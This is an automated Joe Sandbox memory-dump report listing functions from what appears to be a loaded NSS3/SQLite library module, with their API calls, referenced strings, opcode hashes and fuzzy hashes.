%s at line %d of [%.10s], xrefs: 6C543171
database corruption, xrefs: 6C54316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C543022, 6C543156, 6C543162, 6C54318A, 6C543196, 6C5431A2, 6C5431AE, 6C5431BA, 6C5431C6

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 840afea39ff151903180a42e77e06d82fff863a00575de3cf615947ef014faf1
Instruction ID: 227af2b551de55a055aa907158348e132086744ecdff750bbcbfcfef257a0439
Opcode Fuzzy Hash: 840afea39ff151903180a42e77e06d82fff863a00575de3cf615947ef014faf1
Instruction Fuzzy Hash: A3B1AE70E05219DBDB08CF9DCC85AEEB7B1BF48304F14846AE849B7B51D774A942CBA4

Function 6C592D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C592D69

Strings

winUnmapfile2, xrefs: 6C592F7F
kl, xrefs: 6C592DD0
winTruncate1, xrefs: 6C592EBE
winUnmapfile1, xrefs: 6C592F55
@kl, xrefs: 6C592E24
winTruncate2, xrefs: 6C592EF8
winSeekFile, xrefs: 6C592E9C
Pkl, xrefs: 6C592E74, 6C592EC5, 6C592F32, 6C592F5C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: __allrem
String ID: @kl$Pkl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$kl
API String ID: 2933888876-1118074720
Opcode ID: 621cea46661fa95a5d4e390643d30bfa0668c6eb551038a1ea539d7ea98f3291
Instruction ID: 31e6b1b70d17abfccef8034e866fec952b70e3f142682bed0269eab2780b81a6
Opcode Fuzzy Hash: 621cea46661fa95a5d4e390643d30bfa0668c6eb551038a1ea539d7ea98f3291
Instruction Fuzzy Hash: 72619D71B012059FDB04CF68DC88A6A7BB2FB49314F10856DE91AAB790DB31AD06CB95

Function 6C617F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C617FB2

Part of subcall function 6C59BA40: TlsGetValue.KERNEL32 ref: 6C59BA51
Part of subcall function 6C59BA40: TlsGetValue.KERNEL32 ref: 6C59BA6B
Part of subcall function 6C59BA40: EnterCriticalSection.KERNEL32 ref: 6C59BA83
Part of subcall function 6C59BA40: TlsGetValue.KERNEL32 ref: 6C59BAA1
Part of subcall function 6C59BA40: _PR_MD_UNLOCK.NSS3 ref: 6C59BAC0

PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C617FD4

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

Part of subcall function 6C619430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C619466

PR_ExitMonitor.NSS3(?), ref: 6C61801B
PR_EnterMonitor.NSS3(?), ref: 6C618034
TlsGetValue.KERNEL32 ref: 6C6180A2
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6180C0
PR_ExitMonitor.NSS3(?), ref: 6C61811C
PR_ExitMonitor.NSS3(?), ref: 6C618134

Strings

), xrefs: 6C6180DB

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
String ID: )
API String ID: 3537756449-2427484129
Opcode ID: 412926d5f7ad3aca2116e5a87068e6960a65c3cfbb7590f1f314cce7c94a5c92
Instruction ID: bfd4ce1b926718abc61da05471d0f3772fe434216fb1a89408a133c6ac10a27f
Opcode Fuzzy Hash: 412926d5f7ad3aca2116e5a87068e6960a65c3cfbb7590f1f314cce7c94a5c92
Instruction Fuzzy Hash: 23513472A083059AE7109B39CC017EB77B0AF5A31EF054529DD5942E61EB31A508C78E

Function 6C5BFCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C5BFCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C5BFCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C5BFCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5BFD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C5BFD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C5BFD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C5BFD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5BFD84

Strings

:, xrefs: 6C5BFD78

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: a952af62b2b9bda8c6a4c602d6355cea9c5ecf4e278dd7b297b0798774cbe875
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: E031B1BE9002159FEB008AA8DC157AF7BA8AF55318F250634DD14B7B00E772E918C7D6

Function 6C5A0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5A0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5A0F84

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C5BF59B,6C6C890C,?), ref: 6C5A0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C5A0FC1

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C5A0FDB
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A0FEF
PL_FreeArenaPool.NSS3(?), ref: 6C5A1001
PL_FinishArenaPool.NSS3(?), ref: 6C5A1009

Strings

security, xrefs: 6C5A0F5C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: b365cd85ff6f6968c6957bedd63a09513deac6fa7763380b76e2981776d69847
Instruction ID: 54d4723cb1fbb1dc8af084f29410ae6b4761c8788baa63a1e4a946dae238972a
Opcode Fuzzy Hash: b365cd85ff6f6968c6957bedd63a09513deac6fa7763380b76e2981776d69847
Instruction Fuzzy Hash: 142128B1A04204ABE700DF25DD41AAF77B4EF8925CF048519FC18A7601FB31D956CBD6

Function 6C5A6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C5A7D8F,6C5A7D8F,?,?), ref: 6C5A6DC8

Part of subcall function 6C5FFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C5FFE08
Part of subcall function 6C5FFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C5FFE1D
Part of subcall function 6C5FFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C5FFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C5A7D8F,?,?), ref: 6C5A6DD5

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C6C8FA0,00000000,?,?,?,?,6C5A7D8F,?,?), ref: 6C5A6DF7

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C5A6E35

Part of subcall function 6C5FFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C5FFE29
Part of subcall function 6C5FFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C5FFE3D
Part of subcall function 6C5FFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C5FFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C5A6E4C

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C6C8FE0,00000000), ref: 6C5A6E82

Part of subcall function 6C5A6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C5AB21D,00000000,00000000,6C5AB219,?,6C5A6BFB,00000000,?,00000000,00000000,?,?,?,6C5AB21D), ref: 6C5A6B01
Part of subcall function 6C5A6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C5A6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C5A6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C5A6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C6C8FE0,00000000), ref: 6C5A6F6B
PR_SetError.NSS3(FFFFE005,00000000,6C5A7D8F,?,?), ref: 6C5A6FE1

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 606de505c8f1a90b2c1028e0cadb01cb494376e7a309caa8cc17d5b4574fdc90
Instruction ID: 85bf530fcfdfffcd2210a872173689840ff28af93410a5f554e142550c8c64bb
Opcode Fuzzy Hash: 606de505c8f1a90b2c1028e0cadb01cb494376e7a309caa8cc17d5b4574fdc90
Instruction Fuzzy Hash: 58716F71E107469BDB00CF5ACD40AAE7BA4BF99348F154229E818D7B11FB70E996CB90

Function 6C5E0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5E1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5E1085
PK11_GetAllTokens.NSS3 ref: 6C5E10B1
free.MOZGLUE(?), ref: 6C5E1107
PR_SetError.NSS3(00000000,00000000), ref: 6C5E1172
free.MOZGLUE(?), ref: 6C5E1182
free.MOZGLUE(?), ref: 6C5E11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C5E11C5

Part of subcall function 6C5E52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C5BEAC5,00000001), ref: 6C5E52DF
Part of subcall function 6C5E52C0: EnterCriticalSection.KERNEL32(?), ref: 6C5E52F3
Part of subcall function 6C5E52C0: PR_Unlock.NSS3(?), ref: 6C5E5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5E11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5E11F3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 7db296795660777e30375e46a2297c8abe1f543c0f29710cd2eea4845ba26fb2
Instruction ID: f4026e03bd05930fdb54126d757cb2b796a5a11b30dd68e6308968c24836c0ba
Opcode Fuzzy Hash: 7db296795660777e30375e46a2297c8abe1f543c0f29710cd2eea4845ba26fb2
Instruction Fuzzy Hash: 7161A1B0E003459BEB04DF65DC81B9BBBB5AF49348F144128E819AB742EB31E945CB65

Function 6C5EADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE10
EnterCriticalSection.KERNEL32(?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C5CD079,00000000,00000001), ref: 6C5EAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE7F
TlsGetValue.KERNEL32(?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEF1
free.MOZGLUE(6C5CCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?), ref: 6C5EAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAF30

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: a6cb4a5b0753a82278cfd8eee3d15e61f1e59ecc1b66872dc8500b719b913a95
Instruction ID: 11d4ecb5a5f760c6f8bd147fec43c81727ad59be68c13d6c8deafacb7529f13f
Opcode Fuzzy Hash: a6cb4a5b0753a82278cfd8eee3d15e61f1e59ecc1b66872dc8500b719b913a95
Instruction Fuzzy Hash: D0517BB5A00602AFDB01DF29DC84B5ABBB4BF49318F1446A5E81997E11E731E8A4CBD1

Function 6C5C4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C5CAB7F,?,00000000,?), ref: 6C5C4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C5CAB7F,?,00000000,?), ref: 6C5C4CC8
TlsGetValue.KERNEL32(?,6C5CAB7F,?,00000000,?), ref: 6C5C4CE0
EnterCriticalSection.KERNEL32(?,?,6C5CAB7F,?,00000000,?), ref: 6C5C4CF4
PL_HashTableLookup.NSS3(?,?,?,6C5CAB7F,?,00000000,?), ref: 6C5C4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C5C4D10

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C5C4D26

Part of subcall function 6C669DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DC6
Part of subcall function 6C669DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DD1
Part of subcall function 6C669DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C669DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C5C4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C5C4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C5C4E02

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: cc65ca0c0bccb79d0ddb12d2ce6a4e07d47d7c740cd15b23d90f4f0375f95127
Instruction ID: a5eace9d82c21ba196e86fbf71ed7cf7aff338c85e89c2d8cbcefd8706ddc815
Opcode Fuzzy Hash: cc65ca0c0bccb79d0ddb12d2ce6a4e07d47d7c740cd15b23d90f4f0375f95127
Instruction Fuzzy Hash: E641D8B5B00105ABEB00AF68EC80D667BB8AF56318F048574EC0997B12EB31DD14C7D3

Function 6C5ABFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5ABFFB

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C5AC015

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C5AC032
DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C5AC04D

Part of subcall function 6C5F69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5F6A47
Part of subcall function 6C5F69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C5F6A64

DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C5AC064
CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C5AC07B

Part of subcall function 6C5A8980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C5A7310), ref: 6C5A89B8
Part of subcall function 6C5A8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C5A7310), ref: 6C5A89E6
Part of subcall function 6C5A8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C5A8A00
Part of subcall function 6C5A8980: CERT_CopyRDN.NSS3(00000004,00000000,6C5A7310,?,?,00000004,?), ref: 6C5A8A1B
Part of subcall function 6C5A8980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C5A8A74

Part of subcall function 6C5A1D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C5AC097,00000000,000000B0,?), ref: 6C5A1D2C
Part of subcall function 6C5A1D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C5AC09B,00000000,00000000,00000000,?,6C5AC097,00000000,000000B0,?), ref: 6C5A1D3F
Part of subcall function 6C5A1D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C5AC087,00000000,000000B0,?), ref: 6C5A1D54

CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C5AC0AD
SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C5AC0C9

Part of subcall function 6C5B2DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C5AC0D2,6C5AC0CE,00000000,-000000D4,?), ref: 6C5B2DF5
Part of subcall function 6C5B2DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C5AC0CE,00000000,-000000D4,?), ref: 6C5B2E27

CERT_DestroyCertificate.NSS3(00000000), ref: 6C5AC0D6
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AC0E3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
String ID:
API String ID: 3955726912-0
Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction ID: bdf86b7a7b523a939ae473e9df8efb01604e6004fc0c61ec1b79455f4a6d8262
